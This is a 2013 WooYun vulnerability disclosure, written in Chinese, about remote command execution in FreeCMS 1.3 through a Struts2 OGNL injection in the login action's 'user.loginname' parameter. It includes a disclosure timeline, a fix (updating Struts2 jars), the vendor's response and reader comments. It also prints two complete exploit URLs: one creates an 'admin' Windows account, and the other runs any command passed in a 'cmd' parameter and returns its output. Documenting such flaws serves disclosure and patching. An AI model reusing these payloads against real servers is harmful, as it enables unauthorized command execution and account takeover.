当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022939

漏洞标题:FreeCms 命令执行(Ognl执行顺序绕过漏洞附EXP)

相关厂商:FreeCms

漏洞作者: 园长

提交时间:2013-05-02 17:50

修复时间:2013-07-31 17:51

公开时间:2013-07-31 17:51

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-02: 细节已通知厂商并且等待厂商处理中
2013-05-06: 厂商已经确认,细节仅向厂商公开
2013-05-09: 细节向第三方安全合作伙伴开放
2013-06-30: 细节向核心白帽子及相关领域专家公开
2013-07-10: 细节向普通白帽子公开
2013-07-20: 细节向实习白帽子公开
2013-07-31: 细节向公众公开

简要描述:

今天iteye.com首页推荐的CMS,于是看了下。开源免费java CMS - FreeCMS1.3-数据对象-mail 项目地址:https://code.google.com/p/freecms/

详细说明:

开源免费java CMS - FreeCMS1.3-数据对象-mail
项目地址:https://code.google.com/p/freecms/
之前公布的EXP利用工具是不行的,不过可以用我之前发布的某工具执行命令,写shell。
漏洞描述(看EXP3利用就行了):

3.jpg


漏洞证明:

找到登录页面:http://localhost:8080/ff/login.jsp
自行从源码里面获取表单参数,或用上面说的工具自动提取。
然后修改提交的action:http://localhost:8080/ff/login_login.do?user.loginname=EXP
选择类型为String的请求就行了

33.jpg


添加帐号:http://localhost:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec('net user admin admin /add%27%29%29%28meh%29&z[%28user.loginname%29%28%27meh%27%29]=true

2.jpg


有人说命令执行呢?哪里?呵呵,改改之前的EXP不就解决了:
http://localhost:8080/ff/login_login.do?user.loginname=(
%23context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false),
%23_memberAccess["allowStaticMethodAccess"]=new java.lang.Boolean(true),
%23req=@org.apache.struts2.ServletActionContext@getRequest(),
%23exec=@java.lang.Runtime@getRuntime().exec(%23req.getParameter(%22cmd%22)),
%23iswinreader=new java.io.DataInputStream(%23exec.getInputStream()),
%23buffer=new byte[1000],
%23iswinreader.readFully(%23buffer),
%23result=new java.lang.String(%23buffer),
%23response=@org.apache.struts2.ServletActionContext@getResponse(),
%23response.getWriter().println(%23result)
)
&z[(user.loginname)('meh')]=true&cmd=cmd /c set

5555.jpg


修复方案:

更新apache官方最新版本jar包

版权声明:转载请注明来源 园长@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-05-06 22:30

厂商回复:

这个案例是主要是学习新的exp的过程,对于freecms的应用特征,至6日未在国内测试得到互联网上的案例情况。如果白帽子对此有研究心得,可以不吝赐教,以便CNVD尽快定位国内用户情况。
rank 18

最新状态:

暂无


漏洞评价:

评论

  1. 2013-05-02 17:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @_@

  2. 2013-05-02 18:00 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    ognl 看着好牛的样子

  3. 2013-05-02 18:03 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    绕过最新补丁?还是value方式ognl执行顺序绕过?

  4. 2013-05-02 18:38 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    @shine 不是最新的。http://www.inbreak.net/archives/481CVE-2011-3923: Yet another Struts2 Remote Code Execution

  5. 2013-09-17 16:17 | 阿凡提 ( 路人 | Rank:2 漏洞数:2 | 巴依老爷我CNM!)

    此系统感觉代码写的很烂